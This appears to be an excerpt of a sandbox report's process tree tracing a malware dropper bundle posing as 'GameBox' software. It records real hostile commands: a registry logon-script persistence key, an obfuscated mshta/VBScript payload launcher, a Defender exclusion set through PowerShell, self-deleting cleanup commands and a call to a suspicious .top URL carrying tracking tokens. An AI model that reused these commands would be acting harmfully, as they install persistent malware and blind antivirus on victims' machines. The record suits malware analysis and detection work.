                                                                            "C:\Users\Admin\AppData\Local\Temp\is-QKSJ6.tmp\WEATHER Manager.tmp" /SL5="$103A6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                            6⤵
                                                                              PID:5820
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-2F9TM.tmp\Setup.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-2F9TM.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                7⤵
                                                                                  PID:7840
                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-2F9TM.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-2F9TM.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                    8⤵
                                                                                      PID:6668
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                5⤵
                                                                                  PID:5496
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-T8TBO.tmp\Inlog.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-T8TBO.tmp\Inlog.tmp" /SL5="$1038C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                    6⤵
                                                                                      PID:5720
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-R8VJK.tmp\Setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-R8VJK.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                        7⤵
                                                                                          PID:7512
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-VUBFC.tmp\Setup.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-VUBFC.tmp\Setup.tmp" /SL5="$1058C,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-R8VJK.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                            8⤵
                                                                                              PID:7020
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                9⤵
                                                                                                  PID:8116
                                                                                                  • C:\Windows\SysWOW64\expand.exe
                                                                                                    expand C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                    10⤵
                                                                                                      PID:5624
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                    9⤵
                                                                                                      PID:4548
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                        10⤵
                                                                                                          PID:5196
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\vdi_compiler.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\vdi_compiler"
                                                                                                        9⤵
                                                                                                          PID:9924
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-CO7ON.tmp\{app}\vdi_compiler.exe"
                                                                                                            10⤵
                                                                                                              PID:10408
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping localhost -n 4
                                                                                                                11⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:10544
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                            9⤵
                                                                                                              PID:9876
                                                                                                            • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                              "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                              9⤵
                                                                                                                PID:9240
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                        5⤵
                                                                                                          PID:5752
                                                                                                          • C:\Users\Admin\AppData\Roaming\5031872.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\5031872.exe"
                                                                                                            6⤵
                                                                                                              PID:1032
                                                                                                            • C:\Users\Admin\AppData\Roaming\1132653.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\1132653.exe"
                                                                                                              6⤵
                                                                                                                PID:4512
                                                                                                              • C:\Users\Admin\AppData\Roaming\5983282.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\5983282.exe"
                                                                                                                6⤵
                                                                                                                  PID:4432
                                                                                                                • C:\Users\Admin\AppData\Roaming\1246016.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\1246016.exe"
                                                                                                                  6⤵
                                                                                                                    PID:6176
                                                                                                                  • C:\Users\Admin\AppData\Roaming\3086426.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\3086426.exe"
                                                                                                                    6⤵
                                                                                                                      PID:6148
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                    5⤵
                                                                                                                      PID:5712
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-M06I7.tmp\VPN.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-M06I7.tmp\VPN.tmp" /SL5="$10404,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                        6⤵
                                                                                                                          PID:5976
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-2F9TL.tmp\Setup.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-2F9TL.tmp\Setup.exe" /silent /subid=720
                                                                                                                            7⤵
                                                                                                                              PID:7380
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-P9LAT.tmp\Setup.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-P9LAT.tmp\Setup.tmp" /SL5="$2044A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-2F9TL.tmp\Setup.exe" /silent /subid=720
                                                                                                                                8⤵
                                                                                                                                  PID:7940
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                    9⤵
                                                                                                                                      PID:4100
                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                        tapinstall.exe remove tap0901
                                                                                                                                        10⤵
                                                                                                                                          PID:7644
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                        9⤵
                                                                                                                                          PID:6460
                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                                                                                            10⤵
                                                                                                                                              PID:8236
                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                            9⤵
                                                                                                                                              PID:5984
                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                              9⤵
                                                                                                                                                PID:6820
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:5872
                                                                                                                                          • C:\Users\Admin\Documents\45tPYmrHHJgRV2VOncrtg7bB.exe
                                                                                                                                            "C:\Users\Admin\Documents\45tPYmrHHJgRV2VOncrtg7bB.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:4156
                                                                                                                                            • C:\Users\Admin\Documents\4ykk_tOmhYYcofReEOtZ1lqo.exe
                                                                                                                                              "C:\Users\Admin\Documents\4ykk_tOmhYYcofReEOtZ1lqo.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:6244
                                                                                                                                              • C:\Users\Admin\Documents\Y442RnZgrFM_iDdEu1ut7gwO.exe
                                                                                                                                                "C:\Users\Admin\Documents\Y442RnZgrFM_iDdEu1ut7gwO.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:5212
                                                                                                                                                • C:\Users\Admin\Documents\Dh5d49ZSkd_VgOQBtOxD0Hae.exe
                                                                                                                                                  "C:\Users\Admin\Documents\Dh5d49ZSkd_VgOQBtOxD0Hae.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:5964
                                                                                                                                                    • C:\Users\Admin\Documents\Dh5d49ZSkd_VgOQBtOxD0Hae.exe
                                                                                                                                                      C:\Users\Admin\Documents\Dh5d49ZSkd_VgOQBtOxD0Hae.exe
                                                                                                                                                      7⤵
                                                                                                                                                        PID:7932
                                                                                                                                                    • C:\Users\Admin\Documents\wFKdQNuje6fe5kjsUID7vhk5.exe
                                                                                                                                                      "C:\Users\Admin\Documents\wFKdQNuje6fe5kjsUID7vhk5.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4312
                                                                                                                                                      • C:\Users\Admin\Documents\HegPH4eY66ItZwuFMg35Ep2m.exe
                                                                                                                                                        "C:\Users\Admin\Documents\HegPH4eY66ItZwuFMg35Ep2m.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:1776
                                                                                                                                                        • C:\Users\Admin\Documents\dKdZXCC5vCwbNlV1774zbQy7.exe
                                                                                                                                                          "C:\Users\Admin\Documents\dKdZXCC5vCwbNlV1774zbQy7.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:6360
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 796
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:5388
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 800
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:5204
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 828
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:7036
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 956
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:8344
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 992
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:8584
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 1048
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:8772
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 1364
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:9072
                                                                                                                                                          • C:\Users\Admin\Documents\7naThGR3BynDphNpBN5_zCsZ.exe
                                                                                                                                                            "C:\Users\Admin\Documents\7naThGR3BynDphNpBN5_zCsZ.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:6628
                                                                                                                                                            • C:\Users\Admin\Documents\VvFWMYPLK_bHHVUQcyXwTWSe.exe
                                                                                                                                                              "C:\Users\Admin\Documents\VvFWMYPLK_bHHVUQcyXwTWSe.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6720
                                                                                                                                                              • C:\Users\Admin\Documents\W5wkZy3SIptdDx18JFxedDBJ.exe
                                                                                                                                                                "C:\Users\Admin\Documents\W5wkZy3SIptdDx18JFxedDBJ.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:6164
                                                                                                                                                                • C:\Users\Admin\Documents\tPTU_s7yPVUw7u8BWbuliAf0.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\tPTU_s7yPVUw7u8BWbuliAf0.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:6508
                                                                                                                                                                  • C:\Users\Admin\Documents\KZHbo5MwuGzPcOkjBIawqxCB.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\KZHbo5MwuGzPcOkjBIawqxCB.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:6828
                                                                                                                                                                      • C:\Users\Admin\Documents\KZHbo5MwuGzPcOkjBIawqxCB.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\KZHbo5MwuGzPcOkjBIawqxCB.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:2720
                                                                                                                                                                      • C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6316
                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:7552
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:7292
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                                    WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:3732
                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:5040
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:5996
                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:8764
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill -IM "pHUt5H4J_Motq6mvJW0SYoPN.exe" -f
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:5404
                                                                                                                                                                                    • C:\Users\Admin\Documents\HNKfxSRem0T3jMAthYLDoe7B.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\HNKfxSRem0T3jMAthYLDoe7B.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4160
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4283863.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4283863.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:6708
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3036685.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3036685.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:7300
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1003665.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1003665.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:7352
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6439199.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6439199.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:6116
                                                                                                                                                                                              • C:\Users\Admin\Documents\u7BRYYFkimCy8DlNrFj_AND6.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\u7BRYYFkimCy8DlNrFj_AND6.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:6740
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "u7BRYYFkimCy8DlNrFj_AND6.exe" /f & erase "C:\Users\Admin\Documents\u7BRYYFkimCy8DlNrFj_AND6.exe" & exit
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:8824
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /im "u7BRYYFkimCy8DlNrFj_AND6.exe" /f
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:5456
                                                                                                                                                                                                  • C:\Users\Admin\Documents\soKeeiEuKYaq8ZYz_lyopQmS.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\soKeeiEuKYaq8ZYz_lyopQmS.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:6728
                                                                                                                                                                                                      • C:\Users\Admin\Documents\soKeeiEuKYaq8ZYz_lyopQmS.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\soKeeiEuKYaq8ZYz_lyopQmS.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:6972
                                                                                                                                                                                                      • C:\Users\Admin\Documents\hXRibBhaF6nzPoiNV8h4zsBG.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\hXRibBhaF6nzPoiNV8h4zsBG.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:6568
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 388
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:5260
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 660
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:8804
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 696
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:9016
                                                                                                                                                                                                        • C:\Users\Admin\Documents\lytamxAHA47Z3KcXdjVoN2o3.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\lytamxAHA47Z3KcXdjVoN2o3.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:6012
                                                                                                                                                                                                            • C:\Users\Admin\Documents\lytamxAHA47Z3KcXdjVoN2o3.exe
                                                                                                                                                                                                              C:\Users\Admin\Documents\lytamxAHA47Z3KcXdjVoN2o3.exe
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:7544
                                                                                                                                                                                                            • C:\Users\Admin\Documents\dIqB_wuQkrYXpW9RlDBPPOqv.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\dIqB_wuQkrYXpW9RlDBPPOqv.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:6156
                                                                                                                                                                                                              • C:\Users\Admin\Documents\Bevx3ebAy5NOdGW9kyrgp_mx.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\Bevx3ebAy5NOdGW9kyrgp_mx.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:6708
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "Bevx3ebAy5NOdGW9kyrgp_mx.exe" /f & erase "C:\Users\Admin\Documents\Bevx3ebAy5NOdGW9kyrgp_mx.exe" & exit
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:6844
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        taskkill /im "Bevx3ebAy5NOdGW9kyrgp_mx.exe" /f
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:8000
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\83joLsPJryysEImE5llS5yTE.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\83joLsPJryysEImE5llS5yTE.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:5468
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 660
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:4232
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 676
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5668
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 688
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:500
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 668
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:6116
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\OEGwMIQSV5ddemtXMf9Kvg0f.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\OEGwMIQSV5ddemtXMf9Kvg0f.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:6280
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\w1xydbzSMMYZL6gn2Jpq0wv6.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\w1xydbzSMMYZL6gn2Jpq0wv6.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:7404
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-N30JM.tmp\w1xydbzSMMYZL6gn2Jpq0wv6.tmp
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-N30JM.tmp\w1xydbzSMMYZL6gn2Jpq0wv6.tmp" /SL5="$10560,138429,56832,C:\Users\Admin\Documents\w1xydbzSMMYZL6gn2Jpq0wv6.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:7576
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-PREE3.tmp\Setup.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-PREE3.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:4160
                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:776
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:9424
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Vlkg8762gntS5vFyQnpLK1Kp.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\Vlkg8762gntS5vFyQnpLK1Kp.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:7620
                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\Vlkg8762gntS5vFyQnpLK1Kp.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\Vlkg8762gntS5vFyQnpLK1Kp.exe" -q
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:7256
                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\X07aXZhkNfOyacqmKxa4P7c1.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\X07aXZhkNfOyacqmKxa4P7c1.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:7708
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\X07AXZ~1.DLL,s C:\Users\Admin\DOCUME~1\X07AXZ~1.EXE
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:6832
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\X07AXZ~1.DLL,iWMm
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:7432
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\X07AXZ~1.DLL
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                    PID:8440
                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
